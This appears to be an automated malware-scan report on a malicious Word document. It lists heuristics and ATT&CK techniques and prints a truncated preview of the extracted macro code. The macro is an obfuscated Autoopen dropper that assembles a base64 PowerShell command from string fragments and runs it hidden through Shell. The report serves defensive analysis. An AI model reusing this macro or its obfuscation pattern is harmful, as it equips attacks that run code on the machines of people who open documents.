Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an Autoopen subroutine. This subroutine calls a function that constructs and executes a PowerShell command. The constructed PowerShell command is 'powershell -ExecutionPolicy Bypass -WindowStyle hidden -e SQBuAFYAbwBwAHMAZQBTAHkAcwB0AGUAbQBhAG4AZwBlAHIAYQBwAHMAUgB1AG4A', which is designed to run hidden and likely downloads and executes a second-stage payload. The presence of the Shell() call together with the Autoopen marker strongly indicates malicious intent.
Heuristics (6)

- VBA macros detected (medium; 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14128 bytes |

SHA-256 (macros.bas): 26728390b9bb7ed2d86fbdbbea0920956999dd08f02401a8dd665c2c10c6c9d1

Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "UWIbRtrdWfMu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BhECP()
On Error Resume Next
XwqPS = Fix(97430 / CSng(99464) * pwtlVG * GiijKL)
VhBn = CDate(82074)
zdFiiH = Fix(29418 / CSng(51547) * fwdpU * uwMnjE)
VhBn = CDate(27996)
BhECP = zzPIMqlwTV + KKSTchjPBdw + VFBkOjPmWsC + mKLLZavlsWj + uoRZb + PRXiVf + vVvvbii + KmhCMwm + VLuBz + zlRFZkdAj
hmPkYq = Fix(65702 / CSng(86776) * jEsmMU * ZZXVG)
VhBn = CDate(43323)
End Function
Sub Autoopen()
On Error Resume Next
Almkiw = Fix(46844 / CSng(19446) * jzYrPW * kqmHzk)
VhBn = CDate(53500)
pNTOsHzwn (BhECP)
iirNG = Fix(63556 / CSng(86915) * KJPwl * AuTWS)
VhBn = CDate(17939)
End Sub
Function pNTOsHzwn(uPRHKtnCtS)
On Error Resume Next
ncFCin = Fix(59825 / CSng(39286) * fPKdC * HKDFq)
VhBn = CDate(45850)
LGKvJm = dfTfMzoGwVC + Shell(ZkmfKPG + (Chr(vbKeyP)) + aXiqs + uPRHKtnCtS + kHmpWzdO, AwAJnWj + vbHide + FAaDYZazfD)
hAXFd = Fix(80950 / CSng(83352) * aSSTuC * KXtOFv)
VhBn = CDate(57578)
End Function

Attribute VB_Name = "oHEwnITMTRZuEi"
Function zzPIMqlwTV()
On Error Resume Next
pXbqY = Fix(31734 / CSng(12006) * QHiiCX * APdjw)
VhBn = CDate(94076)
VoHvjkjwsjn = "owersH" + "eLL -" + "WinDo" + "wsTyl" + "e hidden " + "-e SQBuAFYAb" + "wBrAGUA" + "LQBlAHgAcABSA" + "GUAUwBzAEkAbwB"
JzbQMK = Fix(1806 / CSng(84624) * btnrVb * RjinoJ)
VhBn = CDate(77808)
OCaWla = "OACgAKAAoAC" + "gAIgB7A" + "DEAMwB9AHsA" + "OAA0AH"
QKMAo = Fix(79158 / CSng(97019) * bwNbPI * vuYdH)
VhBn = CDate(70948)
PSwpAtci = "0AewAzADcAfQ" + "B7ADYAMAB9" + "AHsAO" + "QA3AH"
ffZoM = Fix(5214 / CSng(38531) * CzKMz * zADoc)
VhBn = CDate(7735)
dhwnOiGB = "0AewA" + "0ADYA" + "fQB7ADEANQB" + "9AHsAOQAwAH" + "0AewA5ADM" + "AfQB7A"
sHzLJ = Fix(55563 / CSng(67087) * QfjiCi * bzdvVS)
VhBn = CDate(92434)
IlXhQvB = "DEAMAB9" + "AHsAMQAxADEA" + "fQB7ADEANwB9AHs" + "AMgAwAH0AewAx"
RDICz = Fix(89521 / CSng(38878) * ijCnXa * CZlQlU)
VhBn = CDate(57522)
iQscmufFQwS = "ADEAfQB7ADkANgB" + "9AHsAMgA0AH0" + "AewAzADgAfQB7" + "ADEAMQA0AH0Ae"
zWRZDL = Fix(63451 / CSng(65882) * wtiIAa * wwqCzz)
VhBn = CDate(84332)
jEmHCTAjo = "wAzADMAfQB7ADEA" + "OAB9A" + "HsAOQAxAH0Ae" + "wA3ADYAfQB7ADM" + "AMgB9AHsANQA" + "xAH0AewA2A"
zzPIMqlwTV = VoHvjkjwsjn + OCaWla + PSwpAtci + dhwnOiGB + IlXhQvB + iQscmufFQwS + jEmHCTAjo
End Function
Function KKSTchjPBdw()
On Error Resume Next
BXaVk = Fix(4127 / CSng(19949) * nVLfjV * czwIq)
VhBn = CDate(57905)
nbwqkBoH = "DUAfQB7ADkAOQB9" + "AHsAMwAwAH0AewA" + "xADQAfQB7" + "ADIAOAB9AHsA"
UCzzSp = Fix(56385 / CSng(53542) * ziHYjl * zrmzv)
VhBn = CDate(75226)
IuCOvv = "NwAzAH" + "0AewAyADYAfQB7A" + "DYAOQB" + "9AHsANAAxA" + "H0AewA3ADQAfQ" + "B7ADcANwB" + "9AHsAMgA5AH0Aew" + "A2ADMA" + "fQB7ADM"
uEdjNE = Fix(98234 / CSng(83624) * iJCYW * kVQLlO)
VhBn = CDate(2047)
bcMcjRD = "ANAB9AH" + "sANAA" + "3AH0AewA" + "4ADIAfQB7AD" + "EAMAAyAH0Aew" + "A3ADgAfQB7ADU" + "AMAB9AHsAMQB9AH"
wjrmA = Fix(32023 / CSng(7483) * whNEuo * PXkFd)
VhBn = CDate(55850)
QzbiPsDsDt = "sANAAzAH0AewA1" + "ADkAfQB7" + "ADUANAB9AH" + "sAOQAyAH0AewAy" + "ADEAfQB7" + "ADcAf"
dNoMH = Fix(33369 / CSng(68220) * Batjjw * RwazA)
VhBn = CDate(25039)
SQYmNmhDo = "QB7AD" + "gAMAB9AHsAMQAw" + "ADYAfQB" + "7ADgAfQB7AD" + "gANQB9AHs" + "AMwAxAH0AewA4"
KRqvL = Fix(2271 / CSng(76380) * IXvhF * woImuM)
VhBn = CDate(60606)
LPUHS = "ADgAfQB7ADUAMg" + "B9AHsANQA3" + "AH0Ae" + "wA2AD" + "EAfQB7ADQAN"
KKSTchjPBdw = nbwqkBoH + IuCOvv + bcMcjRD + QzbiPsDsDt + SQYmNmhDo + LPUHS
End Function
Function VFBkOjPmWsC()
On Error Resume Next
LOIMsG = Fix(74397 / CSng(59515) * cBICXW * FiwAR)
VhBn = CDate(41592)
wtMKfpjT = "QB9AHsAMgAyAH0A" + "ewAzAH0Aew" + "AxADAAMwB" + "9AHsANQA4AH0Aew"
wrsTJR = Fix(21417 / CSng(11863) * qXGbm * IhOdsT)
VhBn = CDate(61241)
kiEdjlkvzz = "A2ADQAfQB7AD" + "QAOQB9AHsAMAB9A" + "HsAOQA1AH0A" + "ewA1ADYAfQB7AD" + "QANAB9AHsAMQAw" + "ADUAf ... (truncated)
```